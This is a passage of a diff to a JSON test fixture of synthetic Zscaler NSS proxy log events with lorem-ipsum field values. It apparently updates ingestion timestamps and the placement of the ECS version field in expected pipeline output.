Version/12.16^^department=remagnaa^^user=lamcolab^^event_id=ceroinB^^clienttranstime=umqui^^requestmethod=citation^^requestsize=7073^^requestversion=mcorpori^^status=orisn^^responsesize=2266^^responseversion=etMalor^^transactionsize=7800", "event": { - "ingested": "2021-06-14T08:26:19.845041600Z" + "ingested": "2021-12-14T14:59:54.590737665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cta ZSCALERNSS: time=ercitat Dec 15 8:13:24 2017^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=tecto708.www5.example^^protocol=rdp^^serverip=10.22.122.43^^url=https://example.org/tvolu/dutper.html?nbyCicer=scipit#equuntu^^urlcategory=quamni^^urlclass=turveli^^dlpdictionaries=isciv^^dlpengine=natus^^filetype=boreet^^threatcategory=luptasnu^^threatclass=ento^^pagerisk=snostr^^threatname=udexerc^^clientpublicIP=ovolupta^^ClientIP=10.100.143.226^^location=ametcon^^refererURL=https://internal.example.net/ecillu/quovol.html?ctasu=irat#sitame^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=ueporroq^^user=ute^^event_id=mexer^^clienttranstime=iam^^requestmethod=Bonoru^^requestsize=1396^^requestversion=ntutlab^^status=rumSecti^^responsesize=5091^^responseversion=gnama^^transactionsize=7815", "event": { - "ingested": "2021-06-14T08:26:19.845046Z" + "ingested": "2021-12-14T14:59:54.590738061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tesse ZSCALERNSS: time=olupta Dec 29 3:15:58 
2017^^timezone=GMT+02:00^^action=Blocked^^reason=success^^hostname=ine3181.www.invalid^^protocol=ipv6-icmp^^serverip=10.119.53.68^^url=https://www.example.com/uiavo/uisaut.htm?paq=uianon#nul^^urlcategory=onse^^urlclass=sitam^^dlpdictionaries=inibusBo^^dlpengine=illoin^^filetype=emUtenim^^threatcategory=ende^^threatclass=dexea^^pagerisk=aco^^threatname=sse^^clientpublicIP=ihilm^^ClientIP=10.121.9.5^^location=uptas^^refererURL=https://www5.example.net/ons/unt.txt?ctetur=mvolupta#squame^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=mea^^user=ssec^^event_id=illum^^clienttranstime=eprehe^^requestmethod=tinvolup^^requestsize=497^^requestversion=tvol^^status=ptat^^responsesize=7456^^responseversion=tdolo^^transactionsize=1882", "event": { - "ingested": "2021-06-14T08:26:19.845051Z" + "ingested": "2021-12-14T14:59:54.590738445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eleumi ZSCALERNSS: time=equ Jan 12 10:18:32 2018^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=tsunt3403.www5.test^^protocol=udp^^serverip=10.237.0.173^^url=https://mail.example.com/uasiarch/Malor.jpg?iinea=snos#upt^^urlcategory=oremipsu^^urlclass=tMalor^^dlpdictionaries=oreetd^^dlpengine=lor^^filetype=oreeu^^threatcategory=taspe^^threatclass=eritqui^^pagerisk=atquovol^^threatname=evel^^clientpublicIP=edol^^ClientIP=10.31.153.177^^location=maccus^^refererURL=https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=tiset^^user=sci^^event_id=periam^^clienttranstime=fugiatnu^^requestmethod=dolor^^requestsize=4350^^requestversion=eumfu^^status=docons^^responsesize=1428^^responseversion=eumf^^transactionsize=6826", "event": { - 
"ingested": "2021-06-14T08:26:19.845055800Z" + "ingested": "2021-12-14T14:59:54.590739035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uasi ZSCALERNSS: time=maveniam Jan 27 5:21:06 2018^^timezone=PST^^action=Allowed^^reason=success^^hostname=pitl6126.www.localdomain^^protocol=ipv6-icmp^^serverip=10.243.182.229^^url=https://api.example.org/ntiumt/sumquia.jpg?lam=asnu#com^^urlcategory=rep^^urlclass=mveni^^dlpdictionaries=aquae^^dlpengine=olo^^filetype=edolori^^threatcategory=iaturE^^threatclass=epor^^pagerisk=umexer^^threatname=amnih^^clientpublicIP=tper^^ClientIP=10.229.102.140^^location=nulamc^^refererURL=https://www.example.org/etcon/ctobeat.txt?eddoei=lorumw#eca^^useragent=mobmail android 2.1.3.3150^^department=nimve^^user=duntut^^event_id=emporin^^clienttranstime=oreseosq^^requestmethod=etquasia^^requestsize=1800^^requestversion=tium^^status=nimip^^responsesize=7612^^responseversion=squamest^^transactionsize=3914", "event": { - "ingested": "2021-06-14T08:26:19.845060500Z" + "ingested": "2021-12-14T14:59:54.590739423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pteu ZSCALERNSS: time=uatD Feb 10 12:23:41 2018^^timezone=CEST^^action=Blocked^^reason=unknown^^hostname=remaper3297.internal.test^^protocol=ipv6-icmp^^serverip=10.39.46.155^^url=https://example.com/itsedqu/paq.jpg?hilmol=oluptate#todi^^urlcategory=emvel^^urlclass=pta^^dlpdictionaries=dolo^^dlpengine=itaedi^^filetype=hend^^threatcategory=remagna^^threatclass=adipisc^^pagerisk=aparia^^threatname=maliq^^clientpublicIP=ccusant^^ClientIP=10.120.138.109^^location=oidentsu^^refererURL=https://internal.example.org/onsec/dit.gif?lup=aeca#isau^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile 
Safari/537.36^^department=sciveli^^user=picia^^event_id=BCSe^^clienttranstime=rem^^requestmethod=exer^^requestsize=447^^requestversion=remips^^status=lapari^^responsesize=5763^^responseversion=radipis^^transactionsize=3991", "event": { - "ingested": "2021-06-14T08:26:19.845064900Z" + "ingested": "2021-12-14T14:59:54.590739813Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptate ZSCALERNSS: time=eritqu Feb 24 7:26:15 2018^^timezone=ET^^action=Blocked^^reason=failure^^hostname=tamr1693.api.home^^protocol=ipv6^^serverip=10.53.191.49^^url=https://api.example.org/remeum/etur.html?Quisa=quiav#ctionofd^^urlcategory=elit^^urlclass=sam^^dlpdictionaries=tMal^^dlpengine=porin^^filetype=metMal^^threatcategory=ciati^^threatclass=ecillum^^pagerisk=olor^^threatname=amei^^clientpublicIP=doconseq^^ClientIP=10.133.102.57^^location=CSed^^refererURL=https://example.net/wri/itame.html?dictasun=psa#lorese^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36^^department=ctobeat^^user=onsec^^event_id=idestl^^clienttranstime=litani^^requestmethod=emp^^requestsize=6397^^requestversion=onoru^^status=data^^responsesize=6740^^responseversion=eosqui^^transactionsize=5993", "event": { - "ingested": "2021-06-14T08:26:19.845069500Z" + "ingested": "2021-12-14T14:59:54.590740317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uam ZSCALERNSS: time=quis Mar 11 2:28:49 
2018^^timezone=PST^^action=Allowed^^reason=failure^^hostname=cia5990.api.localdomain^^protocol=icmp^^serverip=10.91.2.225^^url=https://internal.example.org/ree/itten.gif?rsp=imipsa#nostrum^^urlcategory=autodita^^urlclass=ntut^^dlpdictionaries=temveleu^^dlpengine=itametco^^filetype=etcons^^threatcategory=etco^^threatclass=iuntN^^pagerisk=utfugi^^threatname=ursintoc^^clientpublicIP=tio^^ClientIP=10.89.41.97^^location=trudex^^refererURL=https://www.example.net/lup/mipsamv.htm?qua=ionula#pexeaco^^useragent=Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36^^department=nderi^^user=tem^^event_id=tcu^^clienttranstime=eumiu^^requestmethod=nim^^requestsize=141^^requestversion=rehen^^status=uaeab^^responsesize=5521^^responseversion=serro^^transactionsize=1078", "event": { - "ingested": "2021-06-14T08:26:19.845074Z" + "ingested": "2021-12-14T14:59:54.590740825Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eturadip ZSCALERNSS: time=amquaera Mar 25 9:31:24 2018^^timezone=PT^^action=Allowed^^reason=success^^hostname=riatu2467.lan^^protocol=tcp^^serverip=10.221.20.165^^url=https://www.example.net/ritquiin/reseo.jpg?ari=umtot#onemulla^^urlcategory=atquo^^urlclass=borio^^dlpdictionaries=equatD^^dlpengine=uidol^^filetype=inculpa^^threatcategory=ruredol^^threatclass=iadeseru^^pagerisk=loremagn^^threatname=acons^^clientpublicIP=nimadmi^^ClientIP=10.7.18.226^^location=umiurer^^refererURL=https://internal.example.com/oluptass/uidol.txt?ametcon=ofdeFini#tasnu^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 
YaSearchBrowser/10.30^^department=tionev^^user=uasiarch^^event_id=velites^^clienttranstime=uredolor^^requestmethod=epreh^^requestsize=5810^^requestversion=edquiaco^^status=sequatD^^responsesize=4211^^responseversion=naaliq^^transactionsize=4508", "event": { - "ingested": "2021-06-14T08:26:19.845078400Z" + "ingested": "2021-12-14T14:59:54.590741263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asiarc ZSCALERNSS: time=lor Apr 8 4:33:58 2018^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=pici1525.www5.corp^^protocol=ipv6^^serverip=10.178.148.188^^url=https://mail.example.com/dexe/nemul.jpg?yCicero=inimave#eavolupt^^urlcategory=uipe^^urlclass=ipsa^^dlpdictionaries=con^^dlpengine=eirured^^filetype=sequamn^^threatcategory=perspici^^threatclass=inimve^^pagerisk=aea^^threatname=emipsumd^^clientpublicIP=didun^^ClientIP=10.155.252.123^^location=asiarch^^refererURL=https://www5.example.net/utla/deomni.gif?fugi=nse#nesciu^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=ssequ^^user=inrepreh^^event_id=rit^^clienttranstime=velitess^^requestmethod=niam^^requestsize=6665^^requestversion=vel^^status=ionevo^^responsesize=4580^^responseversion=ptate^^transactionsize=52", "event": { - "ingested": "2021-06-14T08:26:19.845082900Z" + "ingested": "2021-12-14T14:59:54.590741659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umfu ZSCALERNSS: time=utla Apr 22 11:36:32 
2018^^timezone=CET^^action=Blocked^^reason=failure^^hostname=dolo6418.internal.host^^protocol=ipv6-icmp^^serverip=10.190.42.245^^url=https://mail.example.org/caecat/uel.html?enim=umq#sistena^^urlcategory=qui^^urlclass=caboN^^dlpdictionaries=imipsam^^dlpengine=eumiu^^filetype=tatevel^^threatcategory=quela^^threatclass=uamquaer^^pagerisk=texplica^^threatname=enimi^^clientpublicIP=illum^^ClientIP=10.220.1.249^^location=iqu^^refererURL=https://api.example.org/eumfugia/reeufugi.gif?uredol=uptat#toditau^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=quuntur^^user=olup^^event_id=aeab^^clienttranstime=uradipis^^requestmethod=aerat^^requestsize=2910^^requestversion=uira^^status=eosqui^^responsesize=3723^^responseversion=quinesc^^transactionsize=4724", "event": { - "ingested": "2021-06-14T08:26:19.845087400Z" + "ingested": "2021-12-14T14:59:54.590742043Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aliqu ZSCALERNSS: time=sequine May 7 6:39:06 2018^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=imveni193.www5.host^^protocol=udp^^serverip=10.112.190.154^^url=https://mail.example.com/runtmoll/busBon.txt?ionev=vitaedi#rna^^urlcategory=cons^^urlclass=Except^^dlpdictionaries=lestiae^^dlpengine=iav^^filetype=umiure^^threatcategory=isiut^^threatclass=tin^^pagerisk=rporiss^^threatname=billoinv^^clientpublicIP=etconse^^ClientIP=10.55.38.153^^location=quido^^refererURL=https://example.org/uames/tla.gif?rch=psa#nreprehe^^useragent=Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g^^department=tvolup^^user=oremeu^^event_id=lab^^clienttranstime=lla^^requestmethod=urau^^requestsize=6127^^requestversion=upt^^status=equamni^^responsesize=363^^responseversion=eroi^^transactionsize=916", 
"event": { - "ingested": "2021-06-14T08:26:19.845091900Z" + "ingested": "2021-12-14T14:59:54.590742422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mdo ZSCALERNSS: time=labore May 21 1:41:41 2018^^timezone=OMST^^action=Allowed^^reason=success^^hostname=ionu3320.api.localhost^^protocol=igmp^^serverip=10.195.153.42^^url=https://api.example.com/lits/tvolu.jpg?squir=gnaaliq#quam^^urlcategory=deriti^^urlclass=edictasu^^dlpdictionaries=eturadi^^dlpengine=umS^^filetype=noru^^threatcategory=aliquide^^threatclass=tDuisaut^^pagerisk=uel^^threatname=dexerc^^clientpublicIP=vol^^ClientIP=10.250.48.82^^location=iqu^^refererURL=https://api.example.com/quuntur/nihi.gif?oremagna=aqu#utemvele^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=serrorsi^^user=tsedquia^^event_id=rsit^^clienttranstime=quis^^requestmethod=upidatat^^requestsize=2982^^requestversion=nihilmo^^status=reetdo^^responsesize=6578^^responseversion=nidol^^transactionsize=4345", "event": { - "ingested": "2021-06-14T08:26:19.845096800Z" + "ingested": "2021-12-14T14:59:54.590743394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite ZSCALERNSS: time=umfugi Jun 4 8:44:15 2018^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=remips1499.www.local^^protocol=ipv6^^serverip=10.252.164.230^^url=https://mail.example.net/loremi/queporro.jpg?ade=nihilmol#nder^^urlcategory=ano^^urlclass=rumexer^^dlpdictionaries=eab^^dlpengine=iaconseq^^filetype=tseddo^^threatcategory=diduntut^^threatclass=rroq^^pagerisk=olore^^threatname=eratvolu^^clientpublicIP=oconsequ^^ClientIP=10.60.52.219^^location=untNeq^^refererURL=https://internal.example.org/scipit/litess.jpg?ide=quunturm#quovo^^useragent=mobmail android 
2.1.3.3150^^department=usan^^user=gnamali^^event_id=iumtota^^clienttranstime=issusci^^requestmethod=fdeFin^^requestsize=2871^^requestversion=psu^^status=strud^^responsesize=501^^responseversion=saute^^transactionsize=7421", "event": { - "ingested": "2021-06-14T08:26:19.845101500Z" + "ingested": "2021-12-14T14:59:54.590743796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumto ZSCALERNSS: time=sequatu Jun 19 3:46:49 2018^^timezone=CT^^action=Allowed^^reason=success^^hostname=mdoloree96.domain^^protocol=ggp^^serverip=10.187.16.73^^url=https://api.example.com/nge/psum.gif?exerci=isnostru#iad^^urlcategory=ngelits^^urlclass=volupt^^dlpdictionaries=billoi^^dlpengine=reseo^^filetype=quam^^threatcategory=ulpaquio^^threatclass=dipisc^^pagerisk=litsed^^threatname=lumd^^clientpublicIP=tiaec^^ClientIP=10.122.102.156^^location=totamr^^refererURL=https://mail.example.org/aper/entor.txt?lumdol=edutper#utemve^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=metMa^^user=emoen^^event_id=ptate^^clienttranstime=mipsumqu^^requestmethod=turad^^requestsize=1704^^requestversion=billo^^status=doloremi^^responsesize=3365^^responseversion=iciatis^^transactionsize=2052", "event": { - "ingested": "2021-06-14T08:26:19.845106100Z" + "ingested": "2021-12-14T14:59:54.590744187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cul ZSCALERNSS: time=tate Jul 3 10:49:23 
2018^^timezone=CEST^^action=Allowed^^reason=failure^^hostname=iatnulap7662.internal.local^^protocol=igmp^^serverip=10.120.215.174^^url=https://internal.example.org/ddoeiusm/apa.txt?uptatemU=rem#onorumet^^urlcategory=iscivel^^urlclass=rinci^^dlpdictionaries=eacomm^^dlpengine=aboNem^^filetype=mull^^threatcategory=ent^^threatclass=rema^^pagerisk=mcol^^threatname=tion^^clientpublicIP=umquia^^ClientIP=10.248.108.55^^location=itation^^refererURL=https://internal.example.org/tat/uredo.html?essequam=imav#mtot^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=tionemu^^user=prehend^^event_id=ntexplic^^clienttranstime=rvelillu^^requestmethod=uatDu^^requestsize=4620^^requestversion=isu^^status=moll^^responsesize=2104^^responseversion=ota^^transactionsize=4562", "event": { - "ingested": "2021-06-14T08:26:19.845110800Z" + "ingested": "2021-12-14T14:59:54.590744578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eniamq ZSCALERNSS: time=aloru Jul 17 5:51:58 2018^^timezone=PT^^action=Allowed^^reason=success^^hostname=sBonoru1929.example^^protocol=ggp^^serverip=10.51.161.245^^url=https://www5.example.net/yCice/uinesci.htm?taevitae=dminimv#quam^^urlcategory=saute^^urlclass=umdol^^dlpdictionaries=rerepr^^dlpengine=ipiscin^^filetype=trudexe^^threatcategory=qua^^threatclass=modit^^pagerisk=tatione^^threatname=aedicta^^clientpublicIP=squamest^^ClientIP=10.15.254.181^^location=emipsum^^refererURL=https://example.com/eFini/atDuisa.jpg?mips=dolo#reeufu^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 
YaSearchBrowser/10.61^^department=adipis^^user=abo^^event_id=suntex^^clienttranstime=uptatema^^requestmethod=uteiru^^requestsize=4600^^requestversion=Cicero^^status=ven^^responsesize=5410^^responseversion=ficia^^transactionsize=7526", "event": { - "ingested": "2021-06-14T08:26:19.845115300Z" + "ingested": "2021-12-14T14:59:54.590745033Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deFinibu ZSCALERNSS: time=iaecons Aug 1 12:54:32 2018^^timezone=ET^^action=Blocked^^reason=success^^hostname=onorumet4871.lan^^protocol=ipv6^^serverip=10.7.152.238^^url=https://api.example.com/itinvolu/adeserun.txt?tinv=Utenima#nse^^urlcategory=umq^^urlclass=enim^^dlpdictionaries=oreve^^dlpengine=metco^^filetype=xercita^^threatcategory=atev^^threatclass=vento^^pagerisk=litsed^^threatname=ciun^^clientpublicIP=rehender^^ClientIP=10.129.66.196^^location=mmodicon^^refererURL=https://api.example.com/tqu/emips.gif?tinvolu=ptat#amquisn^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=dol^^user=equamn^^event_id=scipi^^clienttranstime=rem^^requestmethod=reh^^requestsize=3604^^requestversion=gnama^^status=ursintoc^^responsesize=6628^^responseversion=ction^^transactionsize=491", "event": { - "ingested": "2021-06-14T08:26:19.845120100Z" + "ingested": "2021-12-14T14:59:54.590745423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "siuta ZSCALERNSS: time=atcu Aug 15 7:57:06 
2018^^timezone=PST^^action=Blocked^^reason=success^^hostname=onproi4354.www5.invalid^^protocol=ggp^^serverip=10.29.162.157^^url=https://www.example.org/sci/isquames.gif?tlabor=itecto#loreeuf^^urlcategory=orainci^^urlclass=orese^^dlpdictionaries=aev^^dlpengine=uelaudan^^filetype=lab^^threatcategory=sequa^^threatclass=orinrep^^pagerisk=pta^^threatname=uradi^^clientpublicIP=sequu^^ClientIP=10.185.107.27^^location=susc^^refererURL=https://www.example.org/eatae/siutali.html?quelauda=rcit#dolo^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=orese^^user=evelite^^event_id=remquela^^clienttranstime=toreve^^requestmethod=squirat^^requestsize=2977^^requestversion=equunt^^status=mto^^responsesize=4116^^responseversion=atio^^transactionsize=6258", "event": { - "ingested": "2021-06-14T08:26:19.845124700Z" + "ingested": "2021-12-14T14:59:54.590745807Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rem ZSCALERNSS: time=consecte Aug 29 2:59:40 2018^^timezone=ET^^action=Blocked^^reason=success^^hostname=beataevi7552.api.test^^protocol=ipv6^^serverip=10.215.63.248^^url=https://mail.example.org/umdolo/nimv.htm?equunt=tutla#usmod^^urlcategory=ine^^urlclass=qui^^dlpdictionaries=itse^^dlpengine=lapari^^filetype=Bonor^^threatcategory=ipex^^threatclass=odita^^pagerisk=metc^^threatname=aincidu^^clientpublicIP=reprehe^^ClientIP=10.138.0.214^^location=uisaut^^refererURL=https://internal.example.org/ommodic/mmodic.txt?esse=nihi#xeaco^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 
YaSearchBrowser/10.61^^department=uianonn^^user=eavolupt^^event_id=dantium^^clienttranstime=ors^^requestmethod=dqu^^requestsize=6682^^requestversion=edi^^status=eumiure^^responsesize=1926^^responseversion=eacomm^^transactionsize=2676", "event": { - "ingested": "2021-06-14T08:26:19.845129200Z" + "ingested": "2021-12-14T14:59:54.590746211Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pre ZSCALERNSS: time=aute Sep 12 10:02:15 2018^^timezone=PST^^action=Allowed^^reason=success^^hostname=rvelill1981.www.invalid^^protocol=udp^^serverip=10.26.115.88^^url=https://mail.example.net/tvol/ostru.htm?oei=iquipex#byCice^^urlcategory=deritq^^urlclass=boreetdo^^dlpdictionaries=teni^^dlpengine=iin^^filetype=nostr^^threatcategory=luptatem^^threatclass=tNequepo^^pagerisk=liq^^threatname=eleumiu^^clientpublicIP=etdol^^ClientIP=10.12.130.224^^location=magnido^^refererURL=https://www.example.org/dolor/ing.jpg?umdo=aer#quela^^useragent=Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=itatis^^user=Nequepo^^event_id=edictas^^clienttranstime=emac^^requestmethod=rmagnido^^requestsize=6135^^requestversion=elitsedd^^status=hitecto^^responsesize=6315^^responseversion=repreh^^transactionsize=1238", "event": { - "ingested": "2021-06-14T08:26:19.845133700Z" + "ingested": "2021-12-14T14:59:54.590746600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "usan ZSCALERNSS: time=ugiatn Sep 27 5:04:49 
2018^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=quia7214.example^^protocol=igmp^^serverip=10.193.152.42^^url=https://mail.example.org/pariatur/cita.html?equuntur=rve#atemacc^^urlcategory=labore^^urlclass=iqua^^dlpdictionaries=ciunt^^dlpengine=exea^^filetype=ostrumex^^threatcategory=eruntmol^^threatclass=plicab^^pagerisk=imide^^threatname=uiineav^^clientpublicIP=nder^^ClientIP=10.91.20.27^^location=asia^^refererURL=https://api.example.com/psamvolu/teturad.jpg?iavol=psumdol#urautodi^^useragent=Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36^^department=modtempo^^user=edict^^event_id=nost^^clienttranstime=orisnis^^requestmethod=umq^^requestsize=2801^^requestversion=quatur^^status=isiutali^^responsesize=1508^^responseversion=emquel^^transactionsize=365", "event": { - "ingested": "2021-06-14T08:26:19.845139700Z" + "ingested": "2021-12-14T14:59:54.590747051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iavol ZSCALERNSS: time=utemvel Oct 11 12:07:23 2018^^timezone=PST^^action=Allowed^^reason=failure^^hostname=aturExc7343.invalid^^protocol=ipv6^^serverip=10.146.69.38^^url=https://example.org/aturE/aaliqu.gif?nvol=doloreeu#elillumq^^urlcategory=loremeum^^urlclass=luptatem^^dlpdictionaries=ing^^dlpengine=hen^^filetype=riameaqu^^threatcategory=etd^^threatclass=omnisi^^pagerisk=dolor^^threatname=rsp^^clientpublicIP=quir^^ClientIP=10.55.192.102^^location=tsuntinc^^refererURL=https://example.org/onproid/ciduntut.html?xer=iat#orain^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=uame^^user=quia^^event_id=Exce^^clienttranstime=nim^^requestmethod=userro^^requestsize=1008^^requestversion=uta^^status=tsun^^responsesize=7120^^responseversion=gni^^transactionsize=5280", 
"event": { - "ingested": "2021-06-14T08:26:19.845144700Z" + "ingested": "2021-12-14T14:59:54.590747436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tione ZSCALERNSS: time=nibus Oct 25 7:09:57 2018^^timezone=GMT-07:00^^action=Allowed^^reason=success^^hostname=olo7317.www5.localhost^^protocol=udp^^serverip=10.249.1.143^^url=https://internal.example.org/olorin/orisnisi.gif?eritquii=atevelit#dese^^urlcategory=ptasn^^urlclass=liqui^^dlpdictionaries=ectetur^^dlpengine=eacomm^^filetype=temqu^^threatcategory=tdolore^^threatclass=Utenim^^pagerisk=quisno^^threatname=quaUten^^clientpublicIP=eufugia^^ClientIP=10.124.177.226^^location=iarc^^refererURL=https://www5.example.org/ncidunt/uiac.jpg?luptat=ehend#involupt^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=tincul^^user=isciveli^^event_id=ntutlab^^clienttranstime=sitamet^^requestmethod=onevo^^requestsize=3736^^requestversion=nsequ^^status=ing^^responsesize=3291^^responseversion=vitaed^^transactionsize=7672", "event": { - "ingested": "2021-06-14T08:26:19.845149300Z" + "ingested": "2021-12-14T14:59:54.590747822Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "modit ZSCALERNSS: time=quamnih Nov 9 2:12:32 2018^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=uiin1342.mail.invalid^^protocol=rdp^^serverip=10.167.176.220^^url=https://example.org/vel/preh.html?sequamni=edutpers#deo^^urlcategory=eni^^urlclass=quipe^^dlpdictionaries=oluptat^^dlpengine=stenatus^^filetype=eabillo^^threatcategory=iaecon^^threatclass=ect^^pagerisk=tquid^^threatname=seru^^clientpublicIP=oriss^^ClientIP=10.146.228.249^^location=psumdolo^^refererURL=https://example.net/bor/magnido.html?emagnaal=nih#ncididu^^useragent=Mozilla/5.0 (iPhone; CPU 
